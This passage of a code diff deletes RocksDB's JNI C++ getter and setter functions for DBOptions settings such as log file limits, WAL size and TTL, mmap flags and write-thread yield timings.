- */
-void Java_org_rocksdb_DBOptions_setMaxBackgroundFlushes(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint max_background_flushes) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->max_background_flushes =
-      static_cast<int>(max_background_flushes);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    maxBackgroundFlushes
- * Signature: (J)I
- */
-jint Java_org_rocksdb_DBOptions_maxBackgroundFlushes(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      max_background_flushes;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setMaxLogFileSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setMaxLogFileSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong max_log_file_size) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(max_log_file_size);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::DBOptions*>(jhandle)->max_log_file_size =
-        max_log_file_size;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    maxLogFileSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_maxLogFileSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->max_log_file_size;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setLogFileTimeToRoll
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setLogFileTimeToRoll(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong log_file_time_to_roll) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(
-      log_file_time_to_roll);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::DBOptions*>(jhandle)->log_file_time_to_roll =
-        log_file_time_to_roll;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    logFileTimeToRoll
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_logFileTimeToRoll(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->log_file_time_to_roll;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setKeepLogFileNum
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setKeepLogFileNum(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong keep_log_file_num) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(keep_log_file_num);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::DBOptions*>(jhandle)->keep_log_file_num =
-        keep_log_file_num;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    keepLogFileNum
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_keepLogFileNum(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->keep_log_file_num;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setRecycleLogFileNum
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setRecycleLogFileNum(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong recycle_log_file_num) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(recycle_log_file_num);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::DBOptions*>(jhandle)->recycle_log_file_num =
-        recycle_log_file_num;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    recycleLogFileNum
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_recycleLogFileNum(JNIEnv* env, jobject jobj,
-                                                   jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->recycle_log_file_num;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setMaxManifestFileSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setMaxManifestFileSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong max_manifest_file_size) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->max_manifest_file_size =
-      static_cast<int64_t>(max_manifest_file_size);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    maxManifestFileSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_maxManifestFileSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      max_manifest_file_size;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setTableCacheNumshardbits
- * Signature: (JI)V
- */
-void Java_org_rocksdb_DBOptions_setTableCacheNumshardbits(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint table_cache_numshardbits) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->table_cache_numshardbits =
-      static_cast<int>(table_cache_numshardbits);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    tableCacheNumshardbits
- * Signature: (J)I
- */
-jint Java_org_rocksdb_DBOptions_tableCacheNumshardbits(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      table_cache_numshardbits;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setWalTtlSeconds
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setWalTtlSeconds(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong WAL_ttl_seconds) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->WAL_ttl_seconds =
-      static_cast<int64_t>(WAL_ttl_seconds);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    walTtlSeconds
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_walTtlSeconds(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->WAL_ttl_seconds;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setWalSizeLimitMB
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setWalSizeLimitMB(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong WAL_size_limit_MB) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->WAL_size_limit_MB =
-      static_cast<int64_t>(WAL_size_limit_MB);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    walTtlSeconds
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_walSizeLimitMB(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->WAL_size_limit_MB;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setManifestPreallocationSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setManifestPreallocationSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong preallocation_size) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(preallocation_size);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-        manifest_preallocation_size = preallocation_size;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    manifestPreallocationSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_manifestPreallocationSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)
-      ->manifest_preallocation_size;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    useDirectReads
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_useDirectReads(JNIEnv* env, jobject jobj,
-                                                   jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->use_direct_reads;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setUseDirectReads
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setUseDirectReads(JNIEnv* env, jobject jobj,
-                                                  jlong jhandle,
-                                                  jboolean use_direct_reads) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->use_direct_reads =
-      static_cast<bool>(use_direct_reads);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    useDirectIoForFlushAndCompaction
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_useDirectIoForFlushAndCompaction(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)
-      ->use_direct_io_for_flush_and_compaction;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setUseDirectReads
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setUseDirectIoForFlushAndCompaction(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean use_direct_io_for_flush_and_compaction) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)
-      ->use_direct_io_for_flush_and_compaction =
-      static_cast<bool>(use_direct_io_for_flush_and_compaction);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setAllowFAllocate
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setAllowFAllocate(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jallow_fallocate) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->allow_fallocate =
-      static_cast<bool>(jallow_fallocate);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    allowFAllocate
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_allowFAllocate(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jboolean>(opt->allow_fallocate);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setAllowMmapReads
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setAllowMmapReads(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean allow_mmap_reads) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->allow_mmap_reads =
-      static_cast<bool>(allow_mmap_reads);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    allowMmapReads
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_allowMmapReads(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->allow_mmap_reads;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setAllowMmapWrites
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setAllowMmapWrites(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean allow_mmap_writes) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->allow_mmap_writes =
-      static_cast<bool>(allow_mmap_writes);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    allowMmapWrites
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_allowMmapWrites(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->allow_mmap_writes;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setIsFdCloseOnExec
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setIsFdCloseOnExec(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean is_fd_close_on_exec) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->is_fd_close_on_exec =
-      static_cast<bool>(is_fd_close_on_exec);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    isFdCloseOnExec
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_isFdCloseOnExec(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->is_fd_close_on_exec;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setStatsDumpPeriodSec
- * Signature: (JI)V
- */
-void Java_org_rocksdb_DBOptions_setStatsDumpPeriodSec(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint stats_dump_period_sec) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->stats_dump_period_sec =
-      static_cast<int>(stats_dump_period_sec);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    statsDumpPeriodSec
- * Signature: (J)I
- */
-jint Java_org_rocksdb_DBOptions_statsDumpPeriodSec(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->stats_dump_period_sec;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setAdviseRandomOnOpen
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setAdviseRandomOnOpen(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean advise_random_on_open) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->advise_random_on_open =
-      static_cast<bool>(advise_random_on_open);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    adviseRandomOnOpen
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_adviseRandomOnOpen(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->advise_random_on_open;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setDbWriteBufferSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setDbWriteBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jdb_write_buffer_size) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->db_write_buffer_size = static_cast<size_t>(jdb_write_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    dbWriteBufferSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_dbWriteBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jlong>(opt->db_write_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setAccessHintOnCompactionStart
- * Signature: (JB)V
- */
-void Java_org_rocksdb_DBOptions_setAccessHintOnCompactionStart(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jaccess_hint_value) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->access_hint_on_compaction_start =
-      rocksdb::AccessHintJni::toCppAccessHint(jaccess_hint_value);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    accessHintOnCompactionStart
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_DBOptions_accessHintOnCompactionStart(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return rocksdb::AccessHintJni::toJavaAccessHint(
-      opt->access_hint_on_compaction_start);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setNewTableReaderForCompactionInputs
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setNewTableReaderForCompactionInputs(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jnew_table_reader_for_compaction_inputs) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->new_table_reader_for_compaction_inputs =
-      static_cast<bool>(jnew_table_reader_for_compaction_inputs);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    newTableReaderForCompactionInputs
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_newTableReaderForCompactionInputs(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<bool>(opt->new_table_reader_for_compaction_inputs);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setCompactionReadaheadSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setCompactionReadaheadSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jcompaction_readahead_size) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->compaction_readahead_size =
-      static_cast<size_t>(jcompaction_readahead_size);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    compactionReadaheadSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_compactionReadaheadSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jlong>(opt->compaction_readahead_size);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setRandomAccessMaxBufferSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setRandomAccessMaxBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jrandom_access_max_buffer_size) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->random_access_max_buffer_size =
-      static_cast<size_t>(jrandom_access_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    randomAccessMaxBufferSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_randomAccessMaxBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jlong>(opt->random_access_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setWritableFileMaxBufferSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setWritableFileMaxBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jwritable_file_max_buffer_size) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->writable_file_max_buffer_size =
-      static_cast<size_t>(jwritable_file_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    writableFileMaxBufferSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_writableFileMaxBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jlong>(opt->writable_file_max_buffer_size);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setUseAdaptiveMutex
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setUseAdaptiveMutex(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean use_adaptive_mutex) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->use_adaptive_mutex =
-      static_cast<bool>(use_adaptive_mutex);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    useAdaptiveMutex
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_useAdaptiveMutex(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->use_adaptive_mutex;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setBytesPerSync
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setBytesPerSync(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong bytes_per_sync) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->bytes_per_sync =
-      static_cast<int64_t>(bytes_per_sync);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    bytesPerSync
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_bytesPerSync(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->bytes_per_sync;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setWalBytesPerSync
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setWalBytesPerSync(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jwal_bytes_per_sync) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->wal_bytes_per_sync =
-      static_cast<int64_t>(jwal_bytes_per_sync);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    walBytesPerSync
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_walBytesPerSync(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jlong>(opt->wal_bytes_per_sync);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setEnableThreadTracking
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setEnableThreadTracking(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jenable_thread_tracking) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->enable_thread_tracking = static_cast<bool>(jenable_thread_tracking);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    enableThreadTracking
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_enableThreadTracking(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jboolean>(opt->enable_thread_tracking);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setDelayedWriteRate
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setDelayedWriteRate(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jdelayed_write_rate) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->delayed_write_rate = static_cast<uint64_t>(jdelayed_write_rate);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    delayedWriteRate
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_delayedWriteRate(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jlong>(opt->delayed_write_rate);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setAllowConcurrentMemtableWrite
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setAllowConcurrentMemtableWrite(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean allow) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      allow_concurrent_memtable_write = static_cast<bool>(allow);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    allowConcurrentMemtableWrite
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_allowConcurrentMemtableWrite(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      allow_concurrent_memtable_write;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setEnableWriteThreadAdaptiveYield
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setEnableWriteThreadAdaptiveYield(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean yield) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      enable_write_thread_adaptive_yield = static_cast<bool>(yield);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    enableWriteThreadAdaptiveYield
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_enableWriteThreadAdaptiveYield(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      enable_write_thread_adaptive_yield;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setWriteThreadMaxYieldUsec
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setWriteThreadMaxYieldUsec(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong max) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      write_thread_max_yield_usec = static_cast<int64_t>(max);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    writeThreadMaxYieldUsec
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_writeThreadMaxYieldUsec(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      write_thread_max_yield_usec;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setWriteThreadSlowYieldUsec
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setWriteThreadSlowYieldUsec(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong slow) {
-  reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      write_thread_slow_yield_usec = static_cast<int64_t>(slow);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    writeThreadSlowYieldUsec
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_DBOptions_writeThreadSlowYieldUsec(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::DBOptions*>(jhandle)->
-      write_thread_slow_yield_usec;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setSkipStatsUpdateOnDbOpen
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setSkipStatsUpdateOnDbOpen(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jskip_stats_update_on_db_open) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->skip_stats_update_on_db_open =
-      static_cast<bool>(jskip_stats_update_on_db_open);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    skipStatsUpdateOnDbOpen
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_skipStatsUpdateOnDbOpen(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jboolean>(opt->skip_stats_update_on_db_open);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setWalRecoveryMode
- * Signature: (JB)V
- */
-void Java_org_rocksdb_DBOptions_setWalRecoveryMode(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jwal_recovery_mode_value) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->wal_recovery_mode =
-      rocksdb::WALRecoveryModeJni::toCppWALRecoveryMode(
-          jwal_recovery_mode_value);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    walRecoveryMode
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_DBOptions_walRecoveryMode(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return rocksdb::WALRecoveryModeJni::toJavaWALRecoveryMode(
-      opt->wal_recovery_mode);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setAllow2pc
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setAllow2pc(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jallow_2pc) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->allow_2pc = static_cast<bool>(jallow_2pc);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    allow2pc
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_allow2pc(JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jboolean>(opt->allow_2pc);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setRowCache
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DBOptions_setRowCache(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jrow_cache_handle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  auto* row_cache = reinterpret_cast<std::shared_ptr<rocksdb::Cache>*>(jrow_cache_handle);
-  opt->row_cache = *row_cache;
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setFailIfOptionsFileError
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setFailIfOptionsFileError(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jfail_if_options_file_error) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->fail_if_options_file_error =
-      static_cast<bool>(jfail_if_options_file_error);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    failIfOptionsFileError
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_failIfOptionsFileError(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jboolean>(opt->fail_if_options_file_error);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setDumpMallocStats
- * Signature: (JZ)V
- */
